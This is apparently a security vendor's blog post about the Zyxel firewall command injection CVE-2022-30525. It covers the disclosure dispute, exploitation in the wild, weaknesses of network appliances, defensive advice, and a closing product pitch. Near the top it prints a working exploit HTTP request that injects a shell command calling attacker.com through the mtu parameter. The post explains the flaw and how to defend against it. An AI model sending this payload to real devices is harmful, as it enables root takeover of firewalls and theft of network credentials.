In May 2022, Rapid7 researcher Jake Baines disclosed CVE-2022-30525, an unauthenticated OS command injection vulnerability in Zyxel firewalls. The vulnerability, with a CVSS score of 9.8, allowed attackers to execute arbitrary commands on affected firewalls without any authentication. The affected models — USG FLEX, ATP, VPN, and USG series — are widely deployed in small and medium businesses as the primary perimeter defense. When your firewall is the vulnerability, there's nowhere to hide.
The Vulnerability
CVE-2022-30525 exists in the HTTP interface of affected Zyxel firewalls, specifically in the setWanPortSt CGI handler. The handler accepts a mtu parameter that is passed directly to an OS command without sanitization. An attacker can inject arbitrary shell commands through this parameter.
The exploit requires only an HTTP request to the firewall's management interface:
POST /ztp/cgi-bin/handler HTTP/1.1
Content-Type: application/json
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1",
"vlanid":"5","mtu":"; ping attacker.com;","data":"hi"}
The semicolons break out of the intended command context, and the injected command runs with root privileges on the firewall. Root on the firewall means complete control over the device, including:
- Modifying firewall rules to allow arbitrary traffic
- Intercepting and logging all network traffic passing through the device
- Using the firewall as a pivot point into the internal network
- Deploying persistent backdoors in the firewall firmware
- Disabling logging and security features
The Disclosure Controversy
The disclosure of CVE-2022-30525 was contentious. Rapid7 reported the vulnerability to Zyxel on April 13, 2022. Zyxel released a patch on April 28 but did not publish a CVE or security advisory. Rapid7 discovered the silent patch and decided to publish full details on May 12, arguing that the lack of advisory meant customers didn't know they needed to update.
This disclosure controversy highlighted a recurring problem in the security industry: silent patching. When vendors release patches without advisories, customers who could benefit from knowing about the vulnerability are left in the dark. Automatic updates are rare for network appliances, so without an advisory, most Zyxel customers had no reason to update their firmware.
By the time Rapid7 published, Zyxel had patched quietly, but the vast majority of devices were still running vulnerable firmware because nobody knew there was a reason to update.
The Exploitation Landscape
Within days of public disclosure, exploitation attempts were detected across the internet. The Mirai botnet — which historically targets network devices — was among the first to incorporate CVE-2022-30525 exploits.
Shodan scans revealed over 16,000 Zyxel devices with exposed management interfaces on the internet. While not all were vulnerable models or versions, the attack surface was substantial.
Observed post-exploitation activities included:
Botnet recruitment: Compromised Zyxel firewalls were enrolled in DDoS botnets, leveraging the device's network position and bandwidth.
Cryptomining: Miners deployed on the firewall hardware, consuming processing power while remaining invisible to endpoint security tools.
Network pivoting: Attackers used compromised firewalls as jump points into internal networks, bypassing all perimeter security controls by operating from the perimeter device itself.
VPN credential harvesting: Zyxel firewalls often terminate VPN connections. Compromised devices could capture VPN credentials in transit.
The Network Appliance Security Problem
CVE-2022-30525 is part of a broader and deeply concerning pattern of vulnerabilities in network security appliances. In recent years, critical vulnerabilities have been found in:
- Fortinet FortiGate (CVE-2022-40684, CVE-2023-27997)
- Palo Alto Networks PAN-OS (CVE-2024-3400)
- SonicWall (CVE-2021-20016, CVE-2021-20038)
- Cisco ASA (CVE-2023-20269)
- Pulse Secure/Ivanti (CVE-2021-22893, CVE-2023-46805)
The devices organizations trust to protect their networks are consistently among the most exploited targets. The reasons are structural:
Internet-facing by design: Firewalls and VPN gateways must be internet-accessible. They can't be hidden behind other defenses.
Privileged network position: These devices see all traffic, hold VPN credentials, and control network access. Compromising one device compromises the entire security model.
Difficult to patch: Network appliance updates often require maintenance windows and can disrupt network connectivity. Organizations delay patching because the risk of downtime feels more immediate than the risk of exploitation.
Limited visibility: Most organizations have no endpoint detection on their network appliances. They can't run antivirus, EDR, or SIEM agents on a firewall. Compromises go undetected because there's nothing watching.
Proprietary operating systems: Many network appliances run custom OS variants that security teams can't inspect, audit, or monitor with standard tools.
Defensive Recommendations
1. Never Expose Management Interfaces to the Internet
The Zyxel management interface should only be accessible from a dedicated management network. This single step would have prevented remote exploitation of CVE-2022-30525 entirely. Yet thousands of organizations had their firewall management interfaces publicly accessible.
2. Update Firmware Promptly
Network appliances need the same patching urgency as servers. Subscribe to vendor security advisories (not just release notes) and establish a process for emergency firmware updates.
3. Monitor Appliance Behavior
Even without agents, organizations can monitor network appliance behavior through netflow analysis, syslog monitoring, and configuration change detection. Unusual outbound connections, unexpected configuration changes, and new user accounts are all indicators of compromise.
4. Segment the Management Plane
The network used to manage firewalls, switches, and routers should be completely separate from the production network. Access to management interfaces should require additional authentication and be limited to authorized personnel.
5. Verify Appliance Integrity
After patching, verify the firmware hash against the vendor's published values. Advanced attackers modify firmware to persist through updates, and hash verification is the simplest way to detect this.
How Safeguard.sh Helps
Safeguard.sh extends security visibility to the network infrastructure that traditional tools overlook:
- Network Appliance Inventory: Safeguard.sh tracks firmware versions across your network infrastructure, ensuring firewalls and other appliances are included in vulnerability management processes.
- Vulnerability Alerting: When critical CVEs like CVE-2022-30525 are disclosed, Safeguard.sh immediately identifies affected devices in your environment, regardless of whether the vendor has published an advisory.
- Patch Status Tracking: Safeguard.sh monitors the gap between current and available firmware versions for network appliances, highlighting devices that are falling behind on security updates.
- Attack Surface Visibility: Safeguard.sh identifies internet-exposed management interfaces and other risky configurations on network devices, enabling proactive risk reduction.
CVE-2022-30525 proved that firewalls can be the weakest link in network security. Safeguard.sh ensures your entire infrastructure — including the devices protecting it — is visible, monitored, and secured.